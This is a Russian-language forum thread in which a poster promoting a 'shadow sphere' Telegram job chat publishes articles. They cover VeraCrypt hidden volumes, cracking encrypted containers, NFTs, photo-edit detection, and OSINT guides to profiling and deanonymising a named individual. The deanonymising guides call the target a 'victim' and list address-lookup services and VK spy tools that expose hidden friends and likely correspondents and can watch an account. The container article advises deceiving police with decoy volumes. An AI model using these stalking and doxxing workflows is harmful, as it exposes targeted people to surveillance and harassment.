Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   NEW Авторские статьи / схемы заработка от BlackMast (https://forum.antichat.xyz/showthread.php?t=750994)

BlackMAST 24.02.2022 15:56



https://i.imgur.com/O5ovlEr.gif

Приветствуем всех читателей и участников форума!

В этой теме мы будем публиковать наши авторские статьи.

Наша команда писателей тщательно выбирает интересные темы и пишет оригинальный контент специально для вас!

Каждую неделю мы будем делиться с вами новым контентом, связанный с дарком!

Еще больше контента можно найти на нашем канале в Телеграме!

https://t.me/+_nx0mbcIGWlhMTFi

Авторские статьи по заработку, мануалы и скрипты по безопасности

Абсолютно каждый день свежие новости про крипту, теневые темы, криминал и NFT

Так же у нас есть чат, где можно найти работу в теневой сфере или подыскать покупателей на свои услуги!

BlackMAST 04.03.2022 12:38

https://i.gyazo.com/ace030fed4d3b4e9...5fc56fafa5.jpg

Криптоконтейнер. Создаем "сейф" в ПК

вступить в чат

Цитата:


Криптоконтейнер простым языком - это защищенный сейф в вашем компьютере. Многие люди пренебрегают защитой своих данных. А зря. Всю важную информацию необходимо хранить в криптоконтейнерах, дабы она не попала в руки третьих лиц. Вооружившись новыми знаниями в данной статье, вы сможете создавать зашифрованные контейнеры, обладающие высокой стойкостью к атакам. Создавать мы будем как обычный том, так и скрытый (с двойным дном).

Плюсы криптоконтейнера

  • Безопасность. Ваши файлы будут надежно защищены. Тем не менее любая система не без изъянов, и существуют методы взлома, практикующиеся спецслужбами. О них мы поговорим в следующей статье и предложим способы, которые помогут их избежать.
  • Экстренное уничтожение. Если вы решите удалить файлы, хранящиеся на жестком диске, то удаление обычным способом займет очень много времени, в то время как программа CryptoCrash поможет ликвидировать информацию с криптоконтейнера за считанные секунды.
Программа для шифрования

TrueCrypt или VeraCrypt?


В 2014 году разработчики TrueCrypt заявили, что больше не будут поддерживать проект и предложили своим пользователям альтернативу в видe VeraCrypt. Они также отметили, что VeraCrypt значительно выигрывает у TrueCrypt.

Какие плюсы у VeraCrypt?
  • VeraCrypt более устойчива от брутфоса (атак прямого перебора ключей);
  • Имеет поддержку разработчиков и регулярно обновляется.


Переходим к практической части.

Как создать криптоконтейнер

Первым шагом нужно будет скачать программу VeraCrypt, предназначенную для быстрого шифрования.

Переходим на сайт veracrypt.fr -> "Downloads"

https://i.gyazo.com/04c605eb92937fdf...7318207701.jpg

Выбираем свою операционную систему и скачиваем.

https://i.gyazo.com/6c8fe1bbcebc2e6c...0688842fbf.jpg

После того как программа успешно установлена на ПК, начинаем создание криптоконтейнера. Для этого жмем "Создать том".

https://i.gyazo.com/84af7407a376d972...f01c1c6e2d.jpg

Обычный том

Вначале мы рассмотрим, как создавать обычный криптоконтейнер, после чего перейдем к скрытому.

Выбираем “Создать зашифрованный файловый контейнер”.

https://i.gyazo.com/6b1692df307f8544...0be098e3d3.jpg

Сейчас нам нужен "Обычный том", он в дальнейшем послужит местом хранения скрытого.

https://i.gyazo.com/5be95452147f88cc...a5b3a4e77e.jpg

Выбираем место хранения и имя файла (абсолютно любое). Сам файл может иметь какое угодно расширение, например, .mp4, .txt, .wav.

https://i.gyazo.com/3e77dde3038e27f2...dc7c6008ea.jpg

Затем нам нужно настроить шифрование. VeraCrypt использует такие алгоритмы шифрования как: AES, Serpent, Twofish, Camellia, Кузнечик и их связки.

Для того чтобы зашифровать (и расшифровать) данные, криптоконтейнер не использует пароль. Для шифрования любым алгоритмом (от AES до «Кузнечика») используется двоичный ключ фиксированной длины, так называемый Data Encryption Key или Media Encryption Key (MEK).

Ключ шифрования (MEK) хранится в оперативной памяти совершенно независимо от того, какой алгоритм шифрования вы выбрали в настройках контейнера: AES, Twofish, Serpent, «Кузнечик» или любая комбинация алгоритмов, сложность и скорость их извлечения практически одинакова.

https://i.gyazo.com/c4215779910d9dbb...4d0628ee2b.jpg

Далее требуется обозначить размер нашего тома.

https://i.gyazo.com/7b9fe0b4722099ab...2947da3e35.jpg

Пароль от обычного тома не обязательно должен быть очень сложным, так как всю важную информацию мы все равно будем хранить в скрытом криптоконтейнере.

https://i.gyazo.com/10ff55192a0a0732...b123f3b7b0.jpg

После выполнения всех предыдущих шагов запустится форматирование тома, и криптоконтейнер будет создан.

https://i.gyazo.com/afdb70cd16b969fe...25ee90a4be.jpg

Скрытый том

Чтобы создать скрытый криптоконтейнер, выберите “Создать зашифрованный файловый контейнер”, как и в предыдущий раз, только далее вместо обычного тома, нужно выбрать "Скрытый том VeraCrypt".

https://i.gyazo.com/ea8a06e5c1e5a653...bda6f607fd.jpg

Существует два режима создания тома, их подробное описание указано на скриншоте. Как вы можете увидеть, опция "Обычный режим" предназначена для тех, кто еще не создал обычный том, но так как он у нас уже имеется, то кликаем на "Прямой режим".

https://i.gyazo.com/00ba4d7c40b53060...9f0f685d5e.jpg

Далее указываем расположение ранее созданного обычного контейнера и вводим пароль от него, который вы установили.

Выбираем любой алгоритм шифрования, допустим AES.

Указываем размер скрытого тома и вводим уникальный пароль (подробнее о создании надежного пароля вы узнаете в следующей статье).

Готово! Вы успешно создали криптоконтейнер с двойным дном.

https://i.gyazo.com/f5ac5549b2c9b46b...97a48022f6.jpg

Чтобы его открыть нужно выбрать ваш файл и ввести пароль от обычного или скрытого контейнера, в зависимости от того какой вам требуется.

Вывод

Несмотря на то что криптоконтейнер крайне надежная штука, это не исключает возможности его взлома, как бы печально это не звучало. Не существует 100 % гарантии безопасности, это утопия. Но криптоконтейнер способен значительно усложнить возможную атаку на него или вовсе свести к минимуму. О существующих способах взлома и вариантах их избежать мы поговорим в следующей статье.

https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08

BlackMAST 10.03.2022 20:11

https://i.gyazo.com/5e28d9e2f988df3a...3197d51b21.jpg

Как взламывают криптоконтейнеры

Вступить в наш чат
Цитата:


"Криптоконтейнер нельзя взломать", - многие говорят. Но вынуждены вас разочаровать, это не так. Существует достаточно много способов, которые способны нанести ущерб вашим файлам, хранящимся в криптоконтейнере, и поставить под сомнение вашу безопасность. Будучи ознакомленным с данной информацией, вы измените свой взгляд на криптоконтейнеры и вопросы безопасности в целом. В конце этой статьи мы предложим несколько ценных рекомендаций, которые помогут сделать ваши криптоконтейнеры более устойчивыми к всевозможным атакам.


https://i.gyazo.com/60e31eb3b1133dbe...05a63deac3.jpg

Способы взлома

Взлом через уязвимость программного обеспечения


Программы, которые шифруют ваши данные, могут делать это не очень надежным способом. Да, процент подобного взлома невелик, но все же он есть. Поэтому мы обязательно рекомендуем использовать только проверенные софты, такие как VeraCrypt или TrueCrypt.

BruteForce или атака полным перебором

Данный метод подбора пароля, используемого для шифрования, часто применяется хакерами. Скорость успешного выявления нужного ключа крайне низка и займет десятки лет, но только в том случае, если BruteForce делается на стандартном компьютере со стандартной мощность. Вы не можете исключить тот факт, что подбор пароля может быть произведен на супермощном компьютере со скоростью в тысячи раз выше обычной. Тем не менее, такая процедура не только энергозатратная, но и очень дорогостоящая. Если вы не опасный киберпреступник или террорист, то такая опасность вам не грозит.

Для обычных людей чаще всего применяется более упрощенный BruteForce по словарю. Это значит, что существует многомиллионная база паролей, каждый пароль из которой проверяется. Такой подбор не требует никаких затрат и отличается своей простотой. И единственный способ его избежать - придумать такой пароль, чтобы его не оказалось в базе.

Помимо BruteForce по словарю, есть еще один вид атаки с помощью подбора. Он выглядит следующим образом: собирается вся информация о вас, включающая возраст, адрес, девичью фамилию матери, кличку питомца. После чего генерируется возможные варианты ключа. К примеру, вашего питомца зовут Бобик, значит программа будет использовать такие варианты: Bobik123, B1o2b3i4k5 и так до бесконечности.

Терморектальный (бандитский) криптоанализ

Само название говорит о сути данного метода. В его основе лежат угрозы, пытки и шантаж. Таким образом, никакие сложные пароли вам не помогут, но и здесь есть выход.
  1. Вам необходимо установить программу быстрого уничтожения файлов, такую как Panic Button, она за считанные секунды удалит всю информацию о криптоконтейнере.
  2. Используйте криптоконтейнер с двойным дном. Как его создать подробно описано в этой статье. В таком случае вы можете выдать пароль от обычного тома, а про существование скрытого никто не узнает.
  3. Файл-ключ на microSD карте. При создании криптоконтейнера вам необходимо добавить файл-ключ, расположенный на microSD. Такую карту очень легко уничтожить, сломав ее, тогда вся ваша зашифрованная информация не будет подлежать восстановлению.
Вредоносный вирус

Если так случится, что ваш компьютер окажется заражен трояном или кейлоггером, то ваша приватность окажется под угрозой. Чтобы этого не случилось нужно использовать комплексную защиту вашего ПК. Файл-ключ эффективен не только в борьбе с терморектальным криптоанализом, он так же поможет избежать расшифрования в случае кейлоггера. Не помешает и временное отключение компьютера от сети в момент пользования криптоконтейнером.

Криминалистический анализ дампа памяти

Правоохранительные органы довольно часто используют данный метод. В ходе обыска компьютер изымается, происходит снятие оперативной памяти, а после чего находится информация о паролях. Чтобы сделать дамп, ваш ПК должен быть включен, а криптоконтейнер смонтирован. Дабы избежать такой участи, обязательно установите время автоматического демонтирования. Если вы работаете с очень секретными данными, то поставьте время на 2 минуты, если вы обычный пользователь, то 60 минут будет достаточно. Программа Panic Button тоже не помешает в этом случае, так как она очищает данные из ОС в момент отсутствия.

Взлом при помощи запасного ключа

Если вы пользуетесь программой VeraCrypt, TrueCrypt и другими подобными, то такая уязвимость вам не грозит.

Но такой расклад все же возможен, если вы делали комплексное шифрование системы. Если вы пользователь Microsoft, то ключи сохраняются в Microsoft Account, если macOS, то в iCloud. Будьте внимательны, когда шифруете систему, сразу же отключайте автоматическое сохранение ключа в облаке, иначе все ваши данные могут быть расшифрованы, в случае доступа третьих лиц к вашей учетной записи.

Рекомендации для защиты криптоконтейнера
  • Создайте надежный пароль. В идеале он должен иметь от 30 до 50 символов и храниться только у вас в голове. Записывать его никуда нельзя, тем более раннее использовать где-либо еще. Для того, чтобы его не удалось подобрать методом BruteForce важно не использовать информацию, имеющую какое-то к вам отношение (имена, псевдонимы, клички), слова и фразы, даты тоже под запретом. Пароль должен содержать символы, цифры и буквы верхнего и нижнего регистра.
  • Регулярно меняйте пароль. Важно хотя бы один раз в год проводить смену всех паролей. Это нужно для того, чтобы избежать утечек данных, которые бывают у разных компаний.
  • Имейте более 1 криптоконтейнера. Неразумно хранить все данные в одном месте. Решите сколько криптоконтейнеров вам необходимо и загрузите туда все нужные файлы.
  • Используйте криптоконтейнер с двойным дном. Нужно иметь открытый и скрытый том. В случае, если правоохранительные органы потребует пароль от криптоконтейнера, то смело можно выдать от открытого, в то время как вся тайная информация останется скрытой от их глаз.
  • Маскируйте криптоконтейнеры. Надежно защитить криптоконтейнер не достаточно, более важно сделать так, чтобы его существование не было обнаружено. Для этого программа VeraCrypt не указывает на то, что перед нами находить криптоконтейнер. Вы можете выбрать любое расширение и поместить файл в папку с другими аналогичными расширениями.
  • Криптоконтейнер для приманки. Создайте криптоконтейнер и демонстративно поместите его в видное место, он нужен для отвлечения внимания от основного. Название тоже должно провоцировать интерес, например, "Главное". Загрузите туда маловажные файлы, которые в случае чего вы смело сможете продемонстрировать. Не забывайте регулярно создавать видимость работы с этим контейнером, периодически обновляя данные.
Вывод

Никто не может гарантировать вам полную безопасность, но, используя все вышеизложенные советы, вы способны сами себе ее обеспечить. Советуем вам пересмотреть свои взгляды на защиту информации и взять на вооружение, предложенные рекомендации. Надеюсь, что данная статья была полезной для вас. "Предупрежден - значит вооружен!".

https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08

BlackMAST 10.03.2022 20:22


NFT - феномен в мире криптовалют

Вступить в наш чат

NFT - относительно новое явление, разговоры о котором доносятся отовсюду - новости, газеты, телевидение.

Что это такое и почему все про это говорят?
Цитата:


NFT - это аббревиатура от английского non-fungible tokens, что означает "невзаимозаменяемый токен". Взаимозаменяемость - ключевой момент всех фиатных валют, BTC, ETH всегда можно обменять на другую криптовалюту, что нельзя сказать про NFT. Невзаимозаменяемый значит уникальный, он может представлять из себя товар, картину, песню. Например, если взять искусство, то картины Ван Гога не ровняются картинам И. Е. Репина, так и токен NFT является неповторимым и единственным в своем роде. Его цель - интегрировать уникальные предметы в блокчейн. Эти активы одновременно являются объектами коллекционирования и приносят доход.

В технической основе невзаимозаменяемого токена чаще всего заложен Ethereum, точнее, стандарт ERC-721, в соответствии с которым создаются смарт‑контракты, позволяющие выпускать NFT.

https://i.gyazo.com/86122b15d94b1b58...1da9a8739e.jpg

Как создать NFT-токен?

NFT-токены создаются в цифровом виде с помощью таких платформ, как Binance, OpenSea, Makerspace и т.д. С помощью этих платформ вы можете загружать, присваивать имя, добавлять описание к своим творениям и преобразовывать их в NFT.

Сейчас мы рассмотрим с вами процедуру создания на платформе Binance, которая займет не более 5 минут. Чтобы иметь доступ к созданию и другим расширенным возможностям Binance, вам нужно в обязательном порядке пройти верификацию и подтвердить личность. Также в данный момент создавать NFT на платформе могут только предварительно утвержденные авторы. Для того, чтобы вас утвердили, вы можете написать на почту nft@binance.com и прислать свои идеи, только таким образом работы смогут быть рассмотрены. Но в ближайшем времени данная услуга станет доступна для всех пользователей.

Для начала нам нужно перейти на главную страницу NFT площадки.

https://i.gyazo.com/99bd09800d53f9b6...9ead353993.jpg

Далее нажимаем "Создать" и видим следующую страницу с доступными видами NFT: это может быть картинка, аудио, видео.

https://i.gyazo.com/0a4943658e4dc53d...65d6cea8e2.jpg

Вы можете создать как один NFT (BEP-721) или серию (BEP-1155). С помощью серии вы сможете продать несколько образцов своего творения, каждый с уникальным идентификатором.

Имейте ввиду, что за создание NFT-токена у вас возьмут комиссию. Под комиссией за транзакцию подразумевать все дополнительные расходы при продаже, отчисляемые платформе или автору. Если на других платформах процент комиссий может варьироваться от 2.5 до 15, то на Binance он значительно ниже и составляет 0,005 BNB. На Binance в качестве комиссии используется BNB (Binance Coin). Поэтому удостоверьтесь, что на вашем балансе есть данная криптовалюта.

После того, как ваш файл загрузится, Binance создаст NFT. Посмотреть как купленные, так созданные NFT можно в разделе "Коллекции" -> "Мои NFT".

Также, если у вас уже есть NFT на другой бирже, вы можете их импортировать на Binance.

Способы заработать с помощью NFT

  • NFT Airdrops (раздача). Вы можете стать обладателем NFT совершенно бесплатно, для этого существуют раздачи, которые в этом помогут: NFT holder airdrop, NFT platform airdrop.
  1. NFT holder airdrop.Данный вид раздачи подразумевает, что вы уже являетесь владельцем NFT, в то время как автор выпускает различные штуки для дополнения. К примеру, в недавнем времени Bored Apes сделал подарок своим держателям. Так, владельцы обезьянок получили бесплатные сыворотки, которые меняли их персонажей в непохожих друг на друга мутантов. В скором времени обладателю такой сыворотки было предложено 269 ETH за ее продажу.
  2. NFT platform airdrop.С повышением спроса на NFT появляются новые торговые площадки. Своим первым пользователям они дарят подарки в виде NFT. Поэтому, чтобы стать счастливым обладателем бесплатного токена, отслеживай новые маркетплейсы.
  • Трейдинг NFT. Суть просто - покупаешь дешевле, продаешь дороже. Про трейдинг криптовалютами мы рассказывали здесь.
  • Стейкинг(возможность заработать проценты на изменении курса криптовалюты). Данный способ не включает ваше активное участие. Для пассивного заработка требуется заложить свои NFT, тем самым обеспечивая работоспособность блокчейна.
Капитализация

Мировой рынок NFT в 2021 году достиг $22 млрд. С начала 2020 года общая капитализация NFT выросла в 56 раз.

Токен MANA, служащий для покупок различных виртуальных товаров на маркетплейсах, вырос на 40 процентов за последний месяц и занимает лидирующее положение среди прочих.

https://i.gyazo.com/e11fb871c1906643...77de75b635.jpg

Минусы NFT

  • Отсутствие связи между подлинником и NFT. Покупателям кажется, что покупая NFT, они покупают оригинал. К сожалению, это лишь ловко созданная иллюзия. Приобретая NFT, вы получаете не произведение, а только токен, и ничем, кроме токена, вы не владеете.
  • Технические проблемы. Дело в том, что NFT-токен и само произведение хранятся по отдельности. Возьмем к примеру платформу Nifty Gateway. При публикации NFT, к любому токену, будь то картинка, аудио или видео, прилагается формат JSON (текстовый формат обмена данными). Ключевой момент в нем - это ссылка, указывающая на сервер Nifty, который при запросе перенаправит браузер на картинку, сохраненную в распределенной файловой системе IPFS. Выходит, что NFT, который вы покупаете, - это хеш‑сумма от файла JSON, а не от самого произведения. Токен при этом хранится в блокчейне Ethereum. Случись что с Nifty, связь тот час же прервется. IPFS также не гарантируют никакой надежности: данные тут хранятся до тех пор, пока их активно запрашивают.
  • Нет гарантий.Вы можете вложиться в NFT, ждать момента, пока он вырастет в цене, но этого так и не произойдет. Одним из таких ярких примеров является проект CryptoKitties, как только NFT с котятами поступили в продажу, люди массово стали их скупать по $300, посчитав, что они взлетят в цене. Но котята не только ни взлетели, а упали аж до $2, как только ажиотаж прошел. Разработчики же перевели всю ситуацию в шутку, назвав котят всего лишь развлечением ради игры, а не для прибыльных вложений. Так что, если вы приобрели кота и прогорели, то это ваша проблема.
https://i.gyazo.com/180c9618e38e03d7...88f2f57e8e.jpg

Нет авторских прав. Может показаться странным тот факт, что вы платите большую сумму денег за картинку, но по-прежнему не обладаете ей? NFT не равно авторским правам. Владеет всеми правами только один человек - это создатель. Но как так получается? Всему виной шардинг.

Шардинг

Простыми словами шардинг - это дробление, которое разбивает токен NFT на части поменьше. Сама идея разделения криптовалюты не нова и появилась она из-за ряда возникших проблем. Изначально, покупая NFT с изображением какой-либо картины, вы автоматически приравнивались к владельцу, в том числе обладающим всеми авторскими правами. Поэтому была предложена система шардов, которая позволяет сохранить основные авторские права его создателя, тем не менее покупатель остается вправе демонстрировать NFT, распечатывать копию.
  • владелец выбирает сколько шардов всего будет, какие из них он выставит на продажу, а какие оставит себе;
  • устанавливает цену для каждой части.
Как получить все шарды?
  1. Выкупить все части. Однако есть ряд сложностей, которые не позволят вам этого сделать. Например, некоторые части уже могут быть куплены или просто-напросто не выставлены на продажу.
  2. Допустим, вы уже владеете некой частью шардов NFT, но вам не хватает какого-то количества. Вы можете выкупить недостающие части у других держателей, для этого назначьте цену выкупа и депонируйте шарды в смарт-контракт.
Но даже, если вы выкупите все части, вы все равно не сможете побороться за право владения авторскими правами. Суд все равно будет на стороне автора-создателя, а не на вашей.

Обычно в ходе разделения токен ERC-721 NFT разбивается на взаимозаменяемые части, то есть на токены ERC-20.

Платформы для дробления

  • Nftfy - считается первой платформой по дроблению NFT
  • Fractional.art - дает возможность делить целые коллекции
Потенциал NFT

В настоящее время рынок NFT развивается с бешенной скоростью, охватывая все большие массы. Что касается инвестиций, то риск безусловно есть, так как NFT находится в прямой взаимосвязи со спросом, существующим в определенный момент. Тем не менее цифры и тот факт, что многие известные личности инвестируют в NFT или продают свое творчество, свидетельствует о том, что интерес к NFT растет.

Во второй части вы узнаете о ТОП-10 самых ошеломляюще дорогих NFT за всю историю.

https://telegra.ph/Kriptokontejner-S...ejf-v-PK-02-08

BlackMAST 24.03.2022 17:13


Назови мне свое имя, и я скажу, кто ты: как "пробить" человека?

Вступить в наш чат

Так или иначе, любой человек оставляет своей след в всемирной паутине. Каждый второй сайт собирает, хранит, обрабатывает, а иногда и продает ваши данные третьим лицам.Утечки данных и пренебрежение безопасностью многих людей дают возможность для быстрого сбора информации. Не нужно быть хакером, совершать какие-либо противоправные действия или иметь доступ к закрытым базам правоохранительных органов, чтобы пробить конкретного человека, вся информация лежит на поверхности. Все, что нам нужно - это знать несколько терминов и открытые источники по поиску данных. Обо всем этом и пойдет речь в статье.

Википедиягласит: «90 процентов разведданных приходит из открытых источников и только 10 — за счёт работы агентуры»

Цитата:


OSINT (Open-source intelligence) - разведка в открытых источниках, включает в себя поиск, анализ и сбор разведывательной информации, полученной из общедоступных источников. OSINT не является взломом, шпионажем, вербовкой или иным противозаконным действием.


Этапы:

https://i.gyazo.com/cdd47e9924a20302...c98b6d1647.png
  1. Постановка/формулировка задачи;
  2. Планирование;
  3. Сбор данных;
  4. Обработка информации;
  5. Анализ результатов и отчет.
Постановка задачи:

На начальном этапе важно установить для себя цель, к примеру: "Нужно узнать как можно больше информации об этом человеке". Под информацией мы подразумеваем его биографию, психологический портрет, место жительства, работы и другую важную для нас информацию.

Планирование:

Не имея четкого плана, вы будете долго блуждать на просторах интернета, тщетно пытаясь хоть что-то найти. В лучшем случае вы сможете найти какие-то обрывки данных, в худшем потратите свое время.

Итак, как выстроить план:
  • Известная информация
Подумайте, что на данный момент у вас уже имеется: имя, почта, фотография, круг друзей, телефон и т.д. Это может быть любая информация, за которую хоть как-то можно зацепиться. Даже, казалось бы, обычный ник, используемый в интернете, уже может ускорить поиск.
  • Гипотезы
Когда вы собрали всю известную информацию, вам нужно выстроить несколько предположений. Например:

У вас есть фото, значит вы можете приблизительно установить возраст человека. На фотографии он находится рядом с машиной, следовательно формулируем гипотезу, что машина принадлежит ему и предполагаем ее марку. На нем надет деловой костюм, скорее всего он работает в офисе и т.п.

Будьте готовы к тому, что многие ваши гипотезы могут не подтвердиться, в таком случае сразу же откидывайте несоответствующие и заменяйте новыми предположениями.

Имея несколько гипотез, вы можете переходить к следующему этапу - поиску информации.

Сбор данных

Пожалуй, самый важный и сложный этап всей работы. Для того, чтобы собрать данные нужно знать, где их искать. И начнем мы с самого простого и очевидного на первый взгляд метода поиска данных:

Поисковики

Вы можете найти колоссальное количество информации в обычном Google, если будете правильно составлять запрос. А помогут вам в этом поисковые операторы, о которых мы говорили в прошлой статье.

Предлагаю вашему вниманию подборку поисковиков для облегчения поиска:
  • http://www.searchenginesindex.com/ru/ - подборка поисковиков по всем странам.
  • https://toolbox.google.com/datasetsearch - бета-версия поисковика Google по базам данных.
  • https://hackernoon.com/untraceable-s...s-alternatives - англоязычный поисковик, довольно популярный.
  • https://findo.com/ - умная система поиска по всем личным документам, облачным хранилищам, соцсетям, а так же файлам на устройствах.
  • https://www.deepgram.com/ - поисковик по аудиофайлам.
  • http://www.data.gov/ - специализированный поисковик по всем сайтам и открытым базам данных американского правительства.
  • Omgili - Find out what people are saying - поисковик по форумам, добирается в самые дебри мирового интернета.
  • http://www.revimg.com/ - поисковик по фотографиям, позволяющий определить, где ранее были размещены изображения.
  • https://lumendatabase.org/ - база данных для сбора и анализа юридических запросов на удаление контента. С помощью Lumen можно посмотреть, кем был создан запрос и увидеть удаленный материал.
Поиск информации по номеру телефона
  • Nomer.org - крупная база номеров России и некоторых стран СНГ. Позволяет узнать имя человека или же по имени найти номер телефона и адрес проживания. Для обхождения блокировки нужно использовать VPN.
  • https://ftpn.ru/search-phone/ выдает по номеру телефона дорки в Google и Яндекс.
Поиск информации по Email

Сервисы, позволяющие проверить существование адреса электронной почты:
  • https://2ip.ru/mail-checker/
  • https://www.zerobounce.net/
Более подробная информация:
  • https://emailrep.io/
  • https://www.spydialer.com/default.aspx
Поиск по ФИО
  • Occrp - находит людей, используя миллионы документов, файлов, утечек.
  • Infobel - ищет человека в любой точке мире, показывая номер телефона, адрес.
  • Zytely - покажет адрес человека по ФИО, либо наоборот, но для этого нужно знать город.
  • Yasni - поиск людей по фамилии, имени или никнейму, выдает фото, адрес, номер телефона, профили в социальных сетях.
  • Clustrmaps (https://clustrmaps.com/p/) — находит адрес проживания, номер телефона, возраст, место работы, специальность и многое другое.

Обработка информации

Когда данные собраны, переходим к следующему этапу - обработка. Определяем какая информация у нас есть, и что она дает. Также оцениваем логичность данных, они не должны противоречить друг другу.

Отчет

Так как мы занимаемся разведкой в личных целях и в рамках закона, нам не нужно составлять сложные графики. Однако, полученные данные все равно лучше зафиксировать, так как сложно удержать все в голове. Самый простой вариант: таблица. Она поможет сгруппировать небольшое количество информации в единое целое. Но если накопилось много данных - таблица не поможет, тогда на помощь приходят mindmaps (схемы связей и детализации между объектами). С помощью mindmaps можно увидеть закономерность или общую связь, которая раньше не приходила на ум.

Вывод:

Таким образом, мы узнали, что такое OSINT, рассмотрели его этапы и выяснили, как собирать данные о конкретном человеке в открытых источниках. Существуют огромные возможности, воспользовавшись которыми вы можете попробовать себя в роли интернет-разведчика. Это лишь часть полезных сайтов для поиска интересующей информации. В следующей статье мы более подробно разберем полезные ресурсы по поиску в социальных сетях и пробиву по фотографиям.


BlackMAST 24.03.2022 17:58

https://i.gyazo.com/7de6932a774f8dfb...75cc94342d.jpg

Назови мне свое имя, и я скажу, кто ты: деанон по социальным сетям

Вступить в наш чат
Цитата:


Ни для кого не новость, что социальные сети могут сказать о человеке то, что он и сам не понимает до конца. Ваши интересы, хобби, социальный круг, место жительства - все это и многое другое может стать известным всем желающим. Более того, вся нужная информация находится в открытых источниках. Да, любой человек, не имевший ранее дела с интернет-разведкой, после прочтения данной статьи с легкостью сможет найти много интересного о жертве. Но прежде чем мы начнем, советую вам ознакомиться с базовыми знаниями по OSINT.

Социальные сети

Поиск в таких социальных сетях как Facebook, VK, Instagram, Twitter - главные отправные точки. Их возможности беграничны: поиск по городу, имени, возрасту, учебе и другим данным не составляет труда. Но есть и некоторые неочевидные вещи. Существует ряд ресурсов, о возможностях которых вы не догадываетесь. Они не только облегчают поиск, но и помогают обнаружить информацию, которая скрыта на странице пользователя.

С чего начать поиск?

Личные данные

ФИО, фотография, ник, дата рождения, телефон, семейное положение, адрес, образование и т.д. Если вам известно хотя бы одно из этого, то вы уже в состоянии начать поиск.

Представим следующую ситуацию: вам известен только никнейм человека или его email, но вы понятия не имеете в каких социальных сетях начать поиск.

Тогда предлагаю воспользоваться следующими сервисами:
  • https://knowem.com/ - на данном сайте представлено свыше 500 соц. сетей, вам лишь нужно вести нужный ник, и сервис покажет в каких соц. сетях зарегистрирован пользователь.
  • https://pipl.com/ - полезный ресурс для поиска человека по почте или никнейму. Аналогично предыдущему ищет профили в самых популярных соц. сетях. Несмотря на то что сайт платный, вам предоставляется пробный период 14 дней.


Социальный поиск

Поисковики Google, Yandex индексируют данные из социальных сетей, но зачастую это лишь имя, фамилия и небольшое описание. Операторы поиска помогут найти намного больше, чем обычный запрос в поисковике.

Так, если знать прежний id пользователя или сообщества, которые больше не существуют, можно из кэша поисковика обнаружить удаленный контент, который был на странице на момент индексации. Это также работает и с недавно удаленными постами.

Для поиска профиля человека введите: "vk id7654321";

Для сообщества: "vk club7654321";

Поиск поста: "vk wall7654321", "vk wall-7654321?offset=20" (и менять значение offset, то есть смещения: 40,60,80). Используйте дефис по той причине, что некоторые id сообществ могут совпадать с id пользователей;

Для альбомов: "vk.com/album-7654321_0".

Круг общения

Круг общения человека оставляет очень сильный отпечаток в сети. Его можно отследить и воспроизвести. Но поиск информации - занятие рутинное и несет мало пользы, если не иметь представления, что и где искать. Довольно часто вы можете столкнуться с такими проблемами как: закрытый профиль, скудное количество данных и т.д. Таким образом, вы доходите до того, что часами прочесываете все социальное окружение человека, пытаясь найти хоть какую-то зацепку.

Если человек предпочел скрыть свой аккаунт Вконтакте, то это не проблема, так как его друзья могут предоставить гораздо больше данных о нем. Попробуйте воспользоваться следующими сайтами:
  • http://220vk.com/ - всеобъемлющий сервис, включает такие неявные возможности как: скрытые друзья, исходящие лайки, комментарии, цепочки друзей, черный список, города друзей и другой мониторинг страниц. Также способен установить наблюдение за аккаунтом и отслеживать его.
  • https://vkdia.com/ - узнайте с кем человек ведет переписку, предположительно показывает собеседников с помощью временных интервалов, определяет время проведенное в сети. Не требует авторизации и абсолютно бесплатный.
Facebook же имеет такой сервис как Graph Search, но он все равно мало чего может дать.
  • Возьмите на вооружение сайт graph.tips, который покажет куда больше информации: посещенные места, комментарии на фотографиях и многое другое.
  • http://likealyzer.com/ - мониторинг активности страницы.
  • https://searchisback.com/ - ищет профиль человека по городу, семейному положению, интересам и др.
  • https://findmyfbid.in/ - определяет ID профиля, который изначально скрыт. Благодаря ID вы можете находить любую информацию.
  • http://zesty.ca/facebook/ - поиск информации по ID.
  • whopostedwhat.com - ищет посты в Facebook.
  • @getfb_bot - бот в телеграме, найдет страницу по номеру телефона.
  • phantombuster.com - с помощью данного сервиса вы можете сделать парсинг страницы.


Интересы и сообщества

Помимо круга общения, помощниками могут стать интересы. Присмотритесь в каких сообществах состоит человек, он наверняка будет иметь парочку любимых, которые скажут о его хобби. Если сообщества отсутствуют, то начинаем мониторинг лайков. Вконтакте имеет кучу сайтов для слежения за активностью:
  • http://220vk.com/
  • Шпион ВК онлайн бот. Поиск ВКонтакте: лайки, диалоги, комментарии, слежка


С другими социальными сетями дела обстоят немного иначе. Для поиска лайков и комментариев, например, в Instagram можно воспользоваться поисковым оператором «site:instagram.com».

Вывод

В этой статье мы максимально постарались собрать всю главную информацию и самые полезные ссылки на рабочие сервисы по OSINT в социальных сетях. Надеемся, что данная информация была вам полезной, и вы узнали хоть что-то новое про распространенные инструменты и методы их использования. В следующей статье вы узнаете, как найти человека только по фотографии, а также как устроен поиск по изображению.

https://telegra.ph/Nazovi-mne-svoe-i...m-setyam-02-27

BlackMAST 24.03.2022 18:07

Не верь своим глазам. Как определить и скрыть фотошоп

Вступить в наш чат

Фотография редко предстает перед нами в исходном виде. Зачастую то, что вы видите - это результат долгого и качественного монтажа. Пускают пыль в глаза не только девушки из инстаграма, но так же и многие сервисы. Практически всегда любые услуги сопровождаются картинками, скриншотами. И у вас могут возникнуть сомнения в честности продавца и в предоставляемой им услуге. Нельзя со 100% гарантией сказать, подвергалась ли фотография обработке или нет, но как и везде существует человеческий фактор - неопытность отрисовщика и ваши знания в этом деле. Данная статья поможет вам разобраться в видах монтажа и как его разоблачить.

https://i.gyazo.com/2d2417e241230d45...3cd911d4cc.jpg

Нет единого алгоритма, который определил бы фотошоп. Нельзя загрузить фото в программу и быть уверенным, что она сможет определить монтаж по шумам или, что еще лучше, по отсутствию метаданных. Все методы должны использоваться в совокупности. Существует даже целое подразделение в криминалистике, которое получило название Image Forensics или "криминалистика изображений", в его основе лежит задача определить подлинность фотографии и наличие изменений.

Разберем основные алгоритмы Image Forensics:

Внимательный осмотр

Ваши глаза - основной инструмент. Достаточно загрузить фотографию в любой редактор, увеличить зум на максимум, и все недочеты предстанут перед вами.

Как, например, на этой фотографии. Вы хорошо можете заметить склейки и разрывы полосок, чего никак не должно быть.
